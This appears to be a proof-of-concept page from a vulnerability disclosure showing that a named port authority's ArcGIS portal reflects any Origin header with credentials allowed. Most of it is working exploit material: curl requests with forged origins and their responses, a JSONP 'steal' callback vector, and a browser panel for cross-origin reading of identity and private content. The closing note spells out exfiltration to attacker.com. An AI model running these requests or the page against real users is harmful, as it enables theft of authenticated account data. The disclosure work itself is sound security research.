CORS Misconfiguration — Arbitrary Origin Reflection with Credentials

Target: webapps.portofantwerpbruges.com
What this PoC demonstrates: The ArcGIS Portal at webapps.portofantwerpbruges.com reflects any Origin header in Access-Control-Allow-Origin while returning Access-Control-Allow-Credentials: true. This page (hosted on an attacker-controlled origin) silently reads authenticated user data cross-origin — proving full account data exfiltration with zero user interaction beyond visiting a link.

Prerequisites: The victim must be logged into the PoAB ArcGIS Portal with an active SSO session. Open this page in the same browser where you are authenticated.
Part A — Server-Side Evidence (curl)
1
Arbitrary Origin Reflection — https://evil.com
Request:
curl -sk -D- -o /dev/null \ -H "Origin: https://evil.com" \ "https://webapps.portofantwerpbruges.com/arcgis-portal/sharing/rest/community/self?f=json"
Response headers:
HTTP/1.1 200 OK access-control-allow-origin: https://evil.com access-control-allow-credentials: true
Impact: The server tells the browser: "Yes, https://evil.com is allowed to read this response, and yes, send the user's cookies with the request." Any attacker-controlled website can read authenticated responses.
2
Null Origin Reflection (sandboxed iframe / data: URI)
Request:
curl -sk -D- -o /dev/null \ -H "Origin: null" \ "https://webapps.portofantwerpbruges.com/arcgis-portal/sharing/rest/community/self?f=json"
Response headers:
HTTP/1.1 200 OK access-control-allow-origin: null access-control-allow-credentials: true
Impact: The null origin is exploitable via sandboxed iframes (<iframe sandbox="allow-scripts">), data: URIs, and certain redirect chains — no external hosting required.
3
Subdomain Spoofing — evil.portofantwerpbruges.com
Request:
curl -sk -D- -o /dev/null \ -H "Origin: https://evil.portofantwerpbruges.com" \ "https://webapps.portofantwerpbruges.com/arcgis-portal/sharing/rest/community/self?f=json"
Response headers:
HTTP/1.1 200 OK access-control-allow-origin: https://evil.portofantwerpbruges.com access-control-allow-credentials: true
Impact: Non-existent subdomains are reflected. Combined with any subdomain takeover or XSS on *.portofantwerpbruges.com, this becomes trivially exploitable.
4
ArcGIS Server REST API — Same Misconfiguration
Request:
curl -sk -D- -o /dev/null \ -H "Origin: https://evil.com" \ "https://webapps.portofantwerpbruges.com/arcgis/rest/services/extern/AIS/MapServer/0/query?where=1%3D1&outFields=*&resultRecordCount=1&f=json"
Response headers:
HTTP/1.1 200 OK access-control-allow-origin: https://evil.com access-control-allow-credentials: true
Scope: Both /arcgis-portal/sharing/rest/* (Portal) and /arcgis/rest/* (Server) are affected — the entire GIS API surface reflects arbitrary origins with credentials.
5
JSONP Support — Parallel Exploitation Vector
Request:
curl -sk \ "https://webapps.portofantwerpbruges.com/arcgis-portal/sharing/rest/community/self?f=json&callback=steal"
Response body:
steal({"error":{"code":400,"messageCode":"COM_0019","message":"Not logged in.","details":[]}});
Impact: All portal endpoints support JSONP callback parameter. An attacker can steal authenticated data using a simple <script src="...?callback=steal"> tag — bypasses CORS entirely and works even with strict browser extensions.
Part B — Browser-Side Exploitation (live)
Attacker origin:
0
Cross-Origin Response Read Verification
waiting
1
Authenticated Identity Exfiltration — /community/self
waiting
2
Private Content Enumeration — /search?q=*
waiting
3
User Private Content — /content/users/{username}
waiting
4
ArcGIS Server Data Access — /arcgis/rest/services
waiting

🔴 Exfiltrated Data Summary

⚠ Responsible Disclosure: This PoC is created solely for demonstrating the vulnerability to the security team. No data is exfiltrated to external servers. All results are displayed locally in-browser only. In a real attack scenario, all this data would be silently sent to an attacker-controlled server via fetch("https://attacker.com/collect", ...).